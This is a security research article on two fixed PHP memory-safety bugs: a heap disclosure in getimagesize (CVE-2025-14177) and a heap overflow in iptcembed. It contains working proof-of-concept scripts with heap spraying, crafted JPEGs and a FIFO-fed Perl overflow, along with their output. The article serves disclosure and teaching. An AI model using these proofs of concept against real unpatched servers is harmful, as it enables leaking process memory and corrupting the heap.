Hack the Elephant One Bite at a Time: JPEG-Related Memory-Safety Bugs in PHP

PHP is one of the world’s most popular programming languages. The PHP core itself is rarely perceived as an attack surface — attention usually shifts to frameworks and third-party libraries. However, a significant portion of real-world application logic relies on built-in functions from the ext/standard extension, which handles strings, query parameters, data formats, and files. During our research into the C code of this extension, we discovered several memory management bugs. In this article, we take a deep dive into two of them: a heap memory disclosure in getimagesize and a heap buffer overflow in iptcembed.

Key components and their roles

Zend Engine is the open-source C core of PHP, responsible for interpreting and executing PHP code. When checking your PHP version, you will typically see mentions of both Zend Engine and Zend OPcache.

Zend Version

$ ./sapi/cli/php -v
PHP 8.6.0-dev (cli) (built: Dec 11 2025 15:18:13) (NTS DEBUG)
Copyright (c) The PHP Group
Zend Engine v4.6.0-dev, Copyright (c) Zend Technologies
with Zend OPcache v8.6.0-dev, Copyright (c), by Zend Technologies

In simplified terms, Zend Engine consists of the following components:

Zend VM: the PHP execution subsystem that includes two key components. It acts as the execution “engine,” interpreting instructions, managing the call stack, executing operations (conditions, loops, functions), and calling extension functions. From PHP 8 onwards, Just-In-Time (JIT) compilation offers additional optimization in certain configurations.
- Zend Compiler: converts PHP code into an internal representation understood by the virtual machine. This initial phase utilizes a lexer (tokenization) and a parser (building the syntactic structure), followed by preparation for execution.
- Zend Executor: the opcode executor (the runtime part of the Zend VM). It iterates through op_array, creates and/or updates call frames, manages execute_data, executes built-in and user-defined functions, and switches between opcode handlers. In the source code, this logic resides primarily in zend_execute.c and generated VM handlers.
Zend Memory Manager: the memory manager for the PHP runtime. It handles memory allocation and deallocation for variables, arrays, and objects, utilizing mechanisms like reference counting and garbage collection. In modern versions, it is highly optimized to reduce overhead.
Zend API (Zend application programming interface): a set of internal Zend Engine APIs for writing C extensions (modules). It is used to register functions and classes, define data structures and object handlers, work with zvals, and so on. Essentially, it serves as the interface for connecting to the engine to add new capabilities (for example, database drivers).
Zend Optimizer+ (OPcache): an extension that caches the compilation results of PHP scripts (opcodes within an op_array) in shared memory so that subsequent requests don’t require recompiling the source code. While not strictly part of the core Zend VM interpreter, it usually ships with PHP and is enabled in production environments.
Zend Garbage Collector+: the cycle-collecting garbage collector in Zend Engine. While PHP’s primary memory management model relies on reference counting, the GC additionally identifies and frees objects and arrays that form circular references and thus cannot be freed by refcount alone.

How it works: from PHP code to execution result

The execution lifecycle of a PHP script within the interpreter can be simplified into three major phases: tokenization → parsing and compilation → execution (see the diagram below).

Entry via SAPI: execution always begins with the server API (SAPI). This layer connects the PHP engine to the environment—whether it’s a web server (via an Apache module or PHP-FPM using FastCGI) or the Command Line Interface (CLI). The SAPI receives the request or command, initializes execution, configures output, headers, limits, and the environment, and then passes control to the Zend Engine.
PHP Source Code: the engine receives the script text (from a file or string) as input for compilation or caching, and subsequent execution.
OPcache (if enabled): this serves as the fast path. Before re-parsing the PHP source code, the Zend Engine checks OPcache. This boosts performance: a precompiled set of opcodes, packed into an op_array, is stored in shared memory, avoiding the need to repeatedly read, parse, and compile the source file on every request.
- Cache hit: the engine immediately retrieves the ready op_array and proceeds to execution.
- Cache miss: tokenization, parsing, and compilation are performed, after which the result is saved to OPcache.
Tokenizer (lexer): converts the stream of PHP source code characters into a sequence of tokens (keywords, identifiers, literals, and so on). This serves as the “raw material” for syntax analysis.
Parser: builds the abstract syntax tree (AST). The AST represents the program’s structural tree (expressions, statements, declarations). In modern PHP versions, the AST is a distinct stage that separates syntactic parsing from the generation of executable instructions.
Zend Compiler: translates the AST into an internal executable representation—the op_array structure. It contains opcodes (Zend VM instructions) and associated data, such as constants and literals. Essentially, it is PHP’s compiled internal representation, technically referred to as an op_array containing opcodes and runtime metadata.
Zend Executor (part of Zend VM): interprets opcodes and executes the program (branching, function calls, value operations, exception handling, and so on). During execution, the engine calls built-in functions and C-extension functions, and interacts with the OS via files, networks, processes, and other environmental subsystems.
- Memory and garbage collection: during a request, memory is typically allocated via Zend Memory Manager (optimized for request-bound allocations). The Garbage Collector handles circular references: the cycle-finding algorithm doesn’t run continuously but triggers upon reaching specific thresholds (for example, when the root buffer is full).
- JIT (optional; part of OPcache): if JIT is enabled, the execution of “hot” code fragments may partially shift from opcode interpretation to native code. Note: in PHP’s implementation, JIT is part of OPcache and uses an additional shared memory area to store machine code; entry points are linked to the op_array and opcodes.
- Result via SAPI: the execution outcome is returned to the external environment via the SAPI. This could be an HTTP response, console output, as well as errors, exit codes, and other side effects.

Standard extension

Standard extension (php-src/ext/standard) is a foundational PHP extension that provides the majority of out-of-the-box functions. In a typical build, this extension is compiled alongside the interpreter and registers hundreds of procedural APIs: string and array utilities, URL and HTTP helpers, file operations, stream wrappers, and code for parsing specific data formats (for example, processing JPEG metadata using the getimagesize function).
From a security standpoint, this is one of the most sensitive areas. The C code in ext/standard regularly processes uncontrolled input (files, request payloads, parameters) and is invoked by widely used PHP primitives. Consequently, vulnerabilities and bugs here often have a massive blast radius.

Detected issues

Memory disclosure when reading JPEG APP segments in the getimagesize function

💥 Security issue, CVE-2025-14177, moderate, 6,3 out of 10

Description

In November 2025, a bug was discovered in the standard extension: calling the native getimagesize function could return JPEG APP segment data (for example, APP1) trailing with uninitialized heap bytes. We disclosed this to the vendor, and following their deeper analysis, the flaw was classified as a vulnerability and assigned CVE-2025-14177.

Background
The getimagesize function determines the size of a supported image file and returns its dimensions, file type, MIME type, and the height="..." width="..." string that can be used for an HTML IMG tag. Additionally, via the image_info parameter, it can return extended information, such as JPG APP markers. This mechanism is only supported for JFIF files.
Function interface:
getimagesize(string $filename, array &$image_info = null): array|false

The core of the issue was that, under certain conditions, the APPn data returned via the $info variable did not match the actual segment content in the file. In practice, two effects were observed:

Each subsequent chunk was written to the beginning of the buffer; as a result, the first bytes of $info['APPn'] corresponded to the last read chunk.
The tail of the returned string (the portion of the buffer that was never populated) could contain uninitialized bytes—remnants of previous heap data.

This is a classic memory disclosure vulnerability. If an application processes an image and then uses $info['APPn'] for operations with user files, there is a risk of leaking process memory fragments. Importantly, exploiting this vulnerability requires multi-chunk reading. An APP segment (application segment) in the context of images is a specific type of segment in JPEG files containing metadata or auxiliary information:

EXIF data (shooting parameters, GPS coordinates, and more)
IPTC information (authorship, keywords)
Comments
Creator information (camera, editing software)

A JPEG file consists of multiple segments, starting with the SOI marker 0xFFD8, followed by a sequence of segments.

APP segments (APP0–APP15) are metadata sections with markers 0xFFE0…0xFFEF containing specific data formats (for example, EXIF, XMP). Each APP segment has a 2-byte length field and a payload. In our case, APP1 (0xFFE1) is particularly important, as it typically houses EXIF and XMP data, and processing this segment impacts security during JPEG structure parsing.

The purpose of APP markers in JPEG images is listed in the table below.

MARKER	HEX	PURPOSE
APP0	`0xFFE0`	JFIF / JFXX (thumbnail extension)
APP1	`0xFFE1`	Exif / XMP
APP2	`0xFFE2`	ICC profile / FlashPix extensions (FPXR)
APP3	`0xFFE3`	(not standardized)
APP4	`0xFFE4`	(not standardized)
APP5	`0xFFE5`	(not standardized)
APP6	`0xFFE6`	(not standardized)
APP7	`0xFFE7`	(not standardized)
APP8	`0xFFE8`	SPIFF (Still Picture Interchange File Format)
APP9	`0xFFE9`	(not standardized)
APP10	`0xFFEA`	(not standardized)
APP11	`0xFFEB`	(not standardized)
APP12	`0xFFEC`	Picture Info / Ducky
APP13	`0xFFED`	Photoshop Image Resources (8BIM), including IPTC
APP14	`0xFFEE`	Adobe
APP15	`0xFFEF`	(not standardized)

Technical details

Root cause: incorrect chunk concatenation in php_read_stream_all_chunks

The issue resided in the php_read_APP function and its helper reading function, php_read_stream_all_chunks (php-src/ext/standard/image.c). The concept behind php_read_APP is straightforward: the length of the APP segment is known, so PHP allocates a buffer of N bytes, reads the payload from the stream into it, and then returns the data in $info['APPn']. The critical flaw lies here: the emalloc function allocates uninitialized memory and returns a pointer to it in the buffer variable. If any bytes are never written to buffer, they will still end up in $info['APPn'] via the add_assoc_stringl function.

Function php_read_stream_all_chunks (php-src/ext/standard/image.c)

static int php_read_APP(php_stream * stream, unsigned int marker, zval *info)
{
	size_t length;
	char *buffer;
	char markername[16];
	zval *tmp;

	length = php_read2(stream);
	if (length < 2)	{
		return 0;
	}
	length -= 2;				/* length includes itself */

	buffer = emalloc(length);

	if (php_read_stream_all_chunks(stream, buffer, length) != length) {
		efree(buffer);
		return 0;
	}

	snprintf(markername, sizeof(markername), "APP%d", marker - M_APP0);

	if ((tmp = zend_hash_str_find(Z_ARRVAL_P(info), markername, strlen(markername))) == NULL) {
		/* XXX we only catch the 1st tag of it's kind! */
		add_assoc_stringl(info, markername, buffer, length);
	}

	efree(buffer);
	return 1;
}

The bug stemmed from how chunks were concatenated when reading from the stream. In php_read_stream_all_chunks, the read_total counter was incremented, but the php_stream_read macro continuously wrote to the exact same destination address (buffer)—without applying an offset for the already read bytes.

The function php_read_stream_all_chunks (php-src/ext/standard/image.c)

static size_t php_read_stream_all_chunks(php_stream *stream, char *buffer, size_t length)
{
	size_t read_total = 0;
	do {
		ssize_t read_now = php_stream_read(stream, buffer, length - read_total);
		read_total += read_now;
		if (read_now < stream->chunk_size && read_total != length) {
			return 0;
		}
	} while (read_total < length);

	return read_total;
}

Let’s look at an example where length = 9000 and chunk_size = 8192:

The first php_stream_read reads 8192 bytes and writes to buffer[0..8191].
The second php_stream_read reads 808 bytes and writes to buffer[0..807] (overwriting the beginning of the buffer).
The range buffer[8192..8999] is never populated and remains unwritten.

Result: the php_read_APP function considers the read successful and copies length bytes into $info['APPn'], even though the start of the buffer was overwritten by the last chunk, and the tail remains uninitialized, containing garbage data.

From a public issue to a security issue with the subsequent assignment of a CVE identifier

Initially, the problem appeared to manifest only in a rare scenario involving stream filters. However, while fixing it, the vendor discovered a crucial detail: filters were not a strict prerequisite.

This issue was originally not classified as a security issue due to usage of stream filter in recreation of the issue and the fact that only realy image file is supposed to be used. However, after deeper investigation during the fix, it was discovered that this can be exploitable if attacker knows the stream chunk size (which is mostly default) even on normal image. Such attack would be more complex but possible.

The key trigger is predictable chunking. If an attacker knows the read chunk size (which is the default value in many configurations), they could theoretically craft an input JPEG file to achieve this effect even on a standard image. As a result, the bug was reclassified as a vulnerability and a security advisory was issued. The vulnerability was assigned CVE-2025-14177.

Exploitation

During the triage process, we developed two proofs of concept (PoCs). They are presented below in the chronological order of our correspondence with the vendor.

Proof of concept 1. Original report. Reproduction via php://filter – This is the minimal reproduction initially prepared and submitted to the developers. It reads the file via php://filter to force the runtime to read the APP1 segment in multiple chunks. The filter itself is not a prerequisite for the vulnerability; rather, it serves as a convenient method to reliably trigger the bug.

Following the vendor’s feedback and further analysis, it became clear that the issue is not limited to the use of filters. Any scenario where reading occurs in chunks and the attacker can account for the chunk size (which is often the default value) is sufficient. This led to the creation of Proof of concept 2. Post-feedback. Reproduction without filters, web-like scenario. This filterless variant more closely mimics a real-world web scenario (such as uploading and reading from php://input), where multi-chunk reading is achieved by controlling the flow of data fed into the stream.

Proof of concept 1. Original report. Reproduction via php://filter.

This PoC performs the following steps:

Generates a minimal valid JPEG with a large APP1 segment, ensuring the payload is read across multiple chunks.
Populates a section of heap memory with a specific marker and then frees it. This allows us to identify a potential memory leak if the marker appears in the output data.
Reads the file using php://filter to force multi-chunk reads.
Compares the expected payload against the data returned in $info['APP1'] (specifically looking for the leaked marker at the tail end of the payload).

Below is the initial PHP script used for this:

<?php
// Minimal PoC: corruption/uninitialized memory leak when reading APP1 via php://filter

$file = __DIR__ . '/min.jpg';

// Make APP1 large enough so it is read in multiple chunks
$chunk = 8192;
$tail  = 123;
$payload = str_repeat('A', $chunk) . str_repeat('B', $chunk) . str_repeat('X', $tail);
$app1Len = 2 + strlen($payload);

// Minimal JPEG: SOI + APP1 + SOF0(1x1) + EOI
$sof  = "\xFF\xC0" . pack('n', 11) . "\x08" . pack('n',1) . pack('n',1) . "\x01\x11\x00";
$jpeg = "\xFF\xD8" . "\xFF\xE1" . pack('n', $app1Len) . $payload . $sof . "\xFF\xD9";
file_put_contents($file, $jpeg);

// Mini heap-spray: fill heap with a marker and free it, so the C buffer
// can reuse those areas and return marker remnants in $info['APP1']
$marker = 'LEAK-MARKER-123!';
$spr = substr(str_repeat($marker, intdiv(strlen($payload) + strlen($marker) - 1, strlen($marker))), 0, strlen($payload));
$spray = [];
for ($i = 0; $i < 512; $i++) {
  $x = $spr; $x[0] = chr($i & 0x7F); // Copy on write -> distinct allocations
  $spray[$i] = $x;
}
unset($spray, $x);
gc_collect_cycles();

// Read through a filter to enforce multiple reads
$src = 'php://filter/read=string.rot13|string.rot13/resource=' . $file;
$info = null;
if (!@getimagesize($src, $info) || !isset($info['APP1'])) {
  echo "Error: failed to obtain APP1 from getimagesize().\n";
  exit(1);
}

$exp = $payload;
$ret = $info['APP1'];

// Human-readable output
$lenExp = strlen($exp);
$lenRet = strlen($ret);
echo "APP1 length: expected=$lenExp, actual=$lenRet\n";
echo "Expected APP1 head (HEX): ", bin2hex(substr($exp, 0, 16)), "\n";
echo "Returned APP1 head (HEX): ", bin2hex(substr($ret, 0, 16)), "\n";
echo ($exp === $ret)
  ? "Result: OK - data matches.\n"
  : "Result: VULNERABLE - data differs (corruption/leak).\n";

// If found - show marker offset and a short snippet
$pos = strpos($ret, $marker);
if ($pos !== false) {
  echo "Leak marker found: offset=$pos (inside returned APP1).\n";
  $ctx = 12; // bytes of context left/right
  $start = max(0, $pos - $ctx);
  $end = min(strlen($ret), $pos + strlen($marker) + $ctx);
  $before = substr($ret, $start, $pos - $start);
  $mid    = substr($ret, $pos, strlen($marker));
  $after  = substr($ret, $pos + strlen($marker), $end - ($pos + strlen($marker)));

  $sanitize = function ($s) {
    return preg_replace('/[^\x20-\x7E]/', '.', $s);
  };
  $asciiLine = $sanitize($before) . '[' . $mid . ']' . $sanitize($after);
  $hexLine = bin2hex($before) . '[' . bin2hex($mid) . ']' . bin2hex($after);

  echo "Snippet with marker (ASCII, marker in []): ", $asciiLine, "\n";
  echo "Snippet with marker (HEX, marker in []):   ", $hexLine, "\n";
} else if ($exp !== $ret) {
  echo "Marker not found, but data differs - still indicates a read bug.\n";
}

During the script’s execution, a JPEG image is generated:

$ xxd min.jpg
00000000: ffd8 ffe1 407d 4141 4141 4141 4141 4141  ....@\}AAAAAAAAAA
00000010: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000020: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
........: .... .... .... .... .... .... .... ....  ................
00002000: 4141 4141 4141 4242 4242 4242 4242 4242  AAAAAABBBBBBBBBB
00002010: 4242 4242 4242 4242 4242 4242 4242 4242  BBBBBBBBBBBBBBBB
00002020: 4242 4242 4242 4242 4242 4242 4242 4242  BBBBBBBBBBBBBBBB
........: .... .... .... .... .... .... .... ....  ................
00004000: 4242 4242 4242 5858 5858 5858 5858 5858  BBBBBBXXXXXXXXXX
00004010: 5858 5858 5858 5858 5858 5858 5858 5858  XXXXXXXXXXXXXXXX
00004020: 5858 5858 5858 5858 5858 5858 5858 5858  XXXXXXXXXXXXXXXX
00004030: 5858 5858 5858 5858 5858 5858 5858 5858  XXXXXXXXXXXXXXXX
00004040: 5858 5858 5858 5858 5858 5858 5858 5858  XXXXXXXXXXXXXXXX
00004050: 5858 5858 5858 5858 5858 5858 5858 5858  XXXXXXXXXXXXXXXX
00004060: 5858 5858 5858 5858 5858 5858 5858 5858  XXXXXXXXXXXXXXXX
00004070: 5858 5858 5858 5858 5858 5858 5858 5858  XXXXXXXXXXXXXXXX
00004080: 58ff c000 0b08 0001 0001 0111 00ff d9    X..............

Upon successful execution of the script, we successfully read heap data that should have remained inaccessible.

$ ./php cli.php
APP1 length: expected=16507, actual=16507
Expected APP1 head (HEX): 41414141414141414141414141414141
Returned APP1 head (HEX): 4242424242425a5a5a5a5a5a5a5a5a5a
Result: VULNERABLE - data differs (corruption/leak).
Leak marker found: offset=16392 (inside returned APP1).
Snippet with marker (ASCII, marker in []): -MARKER-123![LEAK-MARKER-123!]LEAK-MARKER-
Snippet with marker (HEX, marker in []):   2d4d41524b45522d31323321[4c45414b2d4d41524b45522d31323321]4c45414b2d4d41524b45522d

Proof of concept 2. Post-feedback. Reproduction without filters, web-like scenario

To demonstrate a scenario commonly encountered in web APIs (where an image is sent in the raw request body rather than as multipart/form-data), we developed a PoC consisting of two compact scripts:

1. The webapp.php script simulates an upload handler. It reads a JPEG from the request body (php://input, or php://stdin in the CLI) and calls getimagesize(..., $info).

<?php

const CHUNK_SIZE = 8192;
const PAYLOAD_LEN = 9000;
const MARKER = 'LEAK-MARKER-123!';

function heap_spray(int $len, string $marker): void
{
  $spr = substr(str_repeat($marker, intdiv($len + strlen($marker) - 1, strlen($marker))), 0, $len);
  $tmp = [];
  for ($i = 0; $i < 512; $i++) {
    $x = $spr;
    $x[0] = chr($i & 0x7F);
    $tmp[$i] = $x;
  }
  unset($tmp, $x);
  gc_collect_cycles();
}

function sanitize_ascii(string $s): string
{
  return preg_replace('/[^\x20-\x7E]/', '.', $s);
}

$src = (PHP_SAPI === 'cli' || PHP_SAPI === 'phpdbg') ? 'php://stdin' : 'php://input';
heap_spray(PAYLOAD_LEN, MARKER);

$info = null;
if (!@getimagesize($src, $info) || !is_array($info) || !isset($info['APP1'])) {
  echo "Error: getimagesize() failed or missing APP1.\n";
  if (is_array($info)) {
    echo "Keys: ", implode(', ', array_keys($info)), "\n";
  }
  exit(1);
}

$app1 = $info['APP1'];
if (str_starts_with($app1, "Exif\0\0")) {
  echo "Result: OK (APP1 starts with Exif)\n";
  exit(0);
}

echo "Result: VULNERABLE (APP1 does not start with Exif)\n";

$pos = strpos($app1, MARKER);
if ($pos !== false) {
  $ctx = 12;
  $start = max(0, $pos - $ctx);
  $end = min(strlen($app1), $pos + strlen(MARKER) + $ctx);
  $before = substr($app1, $start, $pos - $start);
  $mid = substr($app1, $pos, strlen(MARKER));
  $after = substr($app1, $pos + strlen(MARKER), $end - ($pos + strlen(MARKER)));

  echo "Snippet (ASCII): ", sanitize_ascii($before), '[', $mid, ']', sanitize_ascii($after), "\n";
} else {
  echo "Marker not found (still indicates corruption/uninitialized tail).\n";
}

2. The attacker.php script generates a valid JPEG with a large APP1 segment and transmits it in two stages: first, it sends the file prefix up to the APP1 segment data; then, after a brief pause, it sends the remainder of the file. This method of transmission helps trigger a multi-chunk read when the chunk size is known (8192 bytes by default).

<?php

const CHUNK_SIZE = 8192;
const PAYLOAD_LEN = 9000;
const SLEEP_US = 50_000;

function build_jpeg_with_app1(string $app1Payload): string
{
  $app0 = "\xFF\xE0" . pack('n', 16) . "JFIF\0" . "\x01\x01" . "\x00" . pack('n', 1) . pack('n', 1) . "\x00\x00";
  $sof = "\xFF\xC0" . pack('n', 11) . "\x08" . pack('n', 1) . pack('n', 1) . "\x01\x11\x00";
  $app1Len = 2 + strlen($app1Payload);
  return "\xFF\xD8" . $app0 . "\xFF\xE1" . pack('n', $app1Len) . $app1Payload . $sof . "\xFF\xD9";
}

if (PAYLOAD_LEN <= CHUNK_SIZE || PAYLOAD_LEN > 0xFFFF - 2) {
  fwrite(STDERR, "Invalid PAYLOAD_LEN\n");
  exit(2);
}

$payload = "Exif\0\0" . str_repeat('A', CHUNK_SIZE - 6) . str_repeat('X', PAYLOAD_LEN - CHUNK_SIZE);
$jpeg = build_jpeg_with_app1($payload);

$app1MarkerPos = strpos($jpeg, "\xFF\xE1");
if ($app1MarkerPos === false) {
  fwrite(STDERR, "Failed to locate APP1 marker\n");
  exit(2);
}
$splitAt = $app1MarkerPos + 4;

fwrite(STDERR, "Sending JPEG in 2 phases: total=" . strlen($jpeg) . " split_at=$splitAt sleep_us=" . SLEEP_US . "\n");
fwrite(STDOUT, substr($jpeg, 0, $splitAt));
fflush(STDOUT);
usleep(SLEEP_US);
fwrite(STDOUT, substr($jpeg, $splitAt));
fflush(STDOUT);

For demonstration purposes, we will use the CLI, executing the setup across two terminals via a FIFO pipe.

What is FIFO?
The mkfifo command creates a named pipe—a special file that allows two independent processes to exchange bytes just like a standard pipe. Unlike a regular file, a FIFO does not store data on disk and has no actual file size. Instead, it operates as a stream where the reader’s read() operation blocks until the writer begins transmitting data.

Terminal 1. The webapp.php script

$ mkfifo /tmp/php-image-poc; ./php webapp.php < /tmp/php-image-poc
Result: VULNERABLE (APP1 does not start with Exif)
Snippet (ASCII): AAAAKER-123!\[LEAK-MARKER-123!\]LEAK-MARKER-

Terminal 2. The attacker.php script

$ ./php attacker.php > /tmp/php-image-poc
Sending JPEG in 2 phases: total=9038 split_at=24 sleep_us=50000

The first terminal displays the output of the webapp.php. script. The returned data reveals heap memory that should not have been accessible, confirming the successful exploitation of the vulnerability we discovered.

Fix

The fix was highly targeted: after each read, the buffer pointer is now advanced (buffer += read_now), ensuring the next chunk is appended sequentially. This change was introduced in commit “Fix GH-20584” and accompanied by a regression test ext/standard/tests/image/gh20584.phpt.

Heap buffer overflow in the iptcembed function

🐛Public issue (https://github.com/php/php-src/issues/20582)

Description

This is a classic “measure once, read forever” trap. The function relies on a single fstat() result to calculate the heap buffer size, and then proceeds to read the byte stream until EOF.

Background
Heap buffer overflow occurs when data is written past the boundaries of an allocated block of dynamic memory on the heap.

The output buffer (spoolbuf) is pre-allocated based on the st_size value obtained via fstat(). Subsequently, every read byte is appended to the buffer without any capacity checks. For non-regular files (like FIFOs), st_size == 0, but the stream itself doesn’t have a fixed size, leading to a heap buffer overflow.

Background
TOCTOU (time-of-check to time-of-use) is a class of software vulnerability caused by a race condition. It occurs when a program verifies the state of a resource (a file or access rights), but an attacker manages to alter that resource before the program actually uses it. This can lead to unpredictable behavior or facilitate exploitation. It is a classic security flaw where the state of an object changes between the validation (the time of check) and the execution (the time of use).

Technical details

The function iptcembed (php-src/ext/standard/iptc.c) repacks a JPEG: it reads the input stream, parses markers (APP, SOS, and so on), and concurrently copies bytes into a new buffer (spoolbuf), inserting or replacing the APP13 (IPTC) segment along the way.

Background
The iptcembed function is used to embed binary IPTC data into a JPEG image.
Function interface:
iptcembed(string $iptc_data, string $filename, int $spool = 0): string|bool

The fundamental flaw is that the output buffer size is determined only once at the start—based on the fstat result sb.st_size)—and then the code can continue copying input until EOF without verifying if there is free space left in the buffer. For non-regular files (such as FIFOs, pipes, sockets, and devices), st_size is typically 0 or fails to reflect the actual volume of data. Even with regular files, a TOCTOU window is introduced: the file could grow in size after fstat but before the read operation completes.

The execution looks as follows:

The iptcembed function calls fstat and allocates spoolbuf with a size equal to the sum of the overhead data and sb.st_size.
poi is the current write position within spoolbuf; it advances by one for every byte written.
On the M_APP13 and M_SOS branches, the parser stops inserting markers and simply reads the remaining data until EOF, copying everything into spoolbuf. If the stream is longer than the allocated buffer, a heap Out-Of-Bounds (OOB) write occurs.

Below is the point where the buffer size is strictly tied to st_size.

php-src/ext/standard/iptc.c, PHP_FUNCTION(iptcembed)

...
  if (spool < 2) {
    if (zend_fstat(fileno(fp), &sb) != 0) {
      fclose(fp);
      RETURN_FALSE;
    }

    spoolbuf = zend_string_safe_alloc(1, iptcdata_len + sizeof(psheader) + 1024 + 1, sb.st_size, 0); // Allocate the output buffer for the future JPEG: base (iptc + psheader + reserve) + sb.st_size (expected input size)
    poi = (unsigned char*)ZSTR_VAL(spoolbuf);
    memset(poi, 0, iptcdata_len + sizeof(psheader) + sb.st_size + 1024 + 1);
  }
...

As the read operation progresses, poi advances, and bytes are written without checking the buffer bounds.

php-src/ext/standard/iptc.c, php_iptc_get1()

...
static int php_iptc_get1(FILE *fp, int spool, unsigned char **spoolbuf)
{
  int c;
  char cc;

  c = getc(fp);

  if (c == EOF) return EOF;

  if (spool > 0) {
    cc = c;
    PUTC(cc);
  }

  if (spoolbuf) *(*spoolbuf)++ = c; // Vulnerable operation: writing a byte and incrementing the pointer without checking for the end of spoolbuf

  return c;
}
...

The function responsible for reading the remainder simply repeats php_iptc_get1 until EOF is reached—this is inherently dangerous if st_size does not correspond to the actual volume of input data.

php-src/ext/standard/iptc.c, php_iptc_read_remaining()

static int php_iptc_read_remaining(FILE *fp, int spool, unsigned char **spoolbuf)
{
  while (php_iptc_get1(fp, spool, spoolbuf) != EOF) continue;

  return M_EOI;
}

During the processing of the M_APP13 and M_SOS branches that the parser switches to a mode where it copies data until the end of the stream.

php-src/ext/standard/iptc.c, PHP_FUNCTION(iptcembed)

...
    switch (marker) {
      case M_APP13:
        /* we are going to write a new APP13 marker, so don't output the old one */
        php_iptc_skip_variable(fp, 0, 0);
        fgetc(fp); /* skip already copied 0xFF byte */
        php_iptc_read_remaining(fp, spool, poi?&poi:0);
        done = 1;
        break;

      ...
      case M_SOS:
        /* we hit data, no more marker-inserting can be done! */
        php_iptc_read_remaining(fp, spool, poi?&poi:0);
        done = 1;
        break;
...

When reading from a FIFO (st_size == 0) or if the file grows after fstat, the copying loop continues to advance poi beyond the allocated string, resulting in a heap buffer overflow.

Exploitation

To demonstrate the issue in the iptcembed function, we used a two-terminal setup:

1. Terminal A: reader; one-line PHP script.

reader; PHP

$ mkfifo /tmp/pipe.jpg
$ USE_ZEND_ALLOC=0 ASAN_OPTIONS=detect_leaks=0:abort_on_error=1 ./php -n -r 'var_dump(iptcembed("A", "/tmp/pipe.jpg"));'

Note: in debug builds (--enable-debug), an early abortion zend_string_truncate may occur before ASan reports the overflow.

2. Terminal B: writer; one-line Perl script.

writer, Perl

perl -e 'binmode STDOUT; print "\xFF\xD8"; print "\xFF\xE0\x00\x10","JFIF", "\x00"x9; print "\xFF\xDA\x00\x08", "\x00"x6; print "A" x (8*1024*1024);' > /tmp/pipe.jpg

Executing the PHP script in Terminal A will trigger the expected heap buffer overflow error, indicating successful exploitation of the vulnerability.

Stack trace

$ mkfifo /tmp/pipe.jpg
$ USE_ZEND_ALLOC=0 ASAN_OPTIONS=detect_leaks=0:abort_on_error=1 ./php -n -r 'var_dump(iptcembed("A", "/tmp/pipe.jpg"));'
=================================================================
==9252==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x5190000013bf at pc 0x5b2f1c1f2ee1 bp 0x7ffcebb8db20 sp 0x7ffcebb8db10
WRITE of size 1 at 0x5190000013bf thread T0
    #0 0x5b2f1c1f2ee0 in php_iptc_get1 /home/administrator/php/php-src/ext/standard/iptc.c:102
    #1 0x5b2f1c1f3085 in php_iptc_next_marker /home/administrator/php/php-src/ext/standard/iptc.c:150
    #2 0x5b2f1c1f3eaf in zif_iptcembed /home/administrator/php/php-src/ext/standard/iptc.c:233
    #3 0x5b2f1c674736 in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/administrator/php/php-src/Zend/zend_vm_execute.h:1421
    #4 0x5b2f1c7d99a8 in execute_ex /home/administrator/php/php-src/Zend/zend_vm_execute.h:116441
    #5 0x5b2f1c7eeb33 in zend_execute /home/administrator/php/php-src/Zend/zend_vm_execute.h:121924
    #6 0x5b2f1c63cc8a in zend_eval_stringl /home/administrator/php/php-src/Zend/zend_execute_API.c:1367
    #7 0x5b2f1c63d0f6 in zend_eval_stringl_ex /home/administrator/php/php-src/Zend/zend_execute_API.c:1409
    #8 0x5b2f1c63d193 in zend_eval_string_ex /home/administrator/php/php-src/Zend/zend_execute_API.c:1419
    #9 0x5b2f1c9582e9 in do_cli /home/administrator/php/php-src/sapi/cli/php_cli.c:981
    #10 0x5b2f1c95a6fb in main /home/administrator/php/php-src/sapi/cli/php_cli.c:1362
    #11 0x7a0b6142a3b7 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    #12 0x7a0b6142a47a in __libc_start_main_impl ../csu/libc-start.c:360
    #13 0x5b2f1b607024 in _start (/home/administrator/php/php-src/sapi/cli/php+0x607024) (BuildId: 79a1814231dec065dd21d5d0773d8bc9cffa79a0)

0x5190000013bf is located 0 bytes after 1087-byte region [0x519000000f80,0x5190000013bf)
allocated by thread T0 here:
    #0 0x7a0b61afd9c7 in malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:69
    #1 0x5b2f1c5399b8 in __zend_malloc /home/administrator/php/php-src/Zend/zend_alloc.c:3543
    #2 0x5b2f1c53587e in _emalloc /home/administrator/php/php-src/Zend/zend_alloc.c:2780
    #3 0x5b2f1c535c24 in _safe_emalloc /home/administrator/php/php-src/Zend/zend_alloc.c:2824
    #4 0x5b2f1c1f1dfb in zend_string_safe_alloc /home/administrator/php/php-src/Zend/zend_string.h:178
    #5 0x5b2f1c1f3b8c in zif_iptcembed /home/administrator/php/php-src/ext/standard/iptc.c:211
    #6 0x5b2f1c674736 in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/administrator/php/php-src/Zend/zend_vm_execute.h:1421
    #7 0x5b2f1c7d99a8 in execute_ex /home/administrator/php/php-src/Zend/zend_vm_execute.h:116441
    #8 0x5b2f1c7eeb33 in zend_execute /home/administrator/php/php-src/Zend/zend_vm_execute.h:121924
    #9 0x5b2f1c63cc8a in zend_eval_stringl /home/administrator/php/php-src/Zend/zend_execute_API.c:1367
    #10 0x5b2f1c63d0f6 in zend_eval_stringl_ex /home/administrator/php/php-src/Zend/zend_execute_API.c:1409
    #11 0x5b2f1c63d193 in zend_eval_string_ex /home/administrator/php/php-src/Zend/zend_execute_API.c:1419
    #12 0x5b2f1c9582e9 in do_cli /home/administrator/php/php-src/sapi/cli/php_cli.c:981
    #13 0x5b2f1c95a6fb in main /home/administrator/php/php-src/sapi/cli/php_cli.c:1362
    #14 0x7a0b6142a3b7 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    #15 0x7a0b6142a47a in __libc_start_main_impl ../csu/libc-start.c:360
    #16 0x5b2f1b607024 in _start (/home/administrator/php/php-src/sapi/cli/php+0x607024) (BuildId: 79a1814231dec065dd21d5d0773d8bc9cffa79a0)

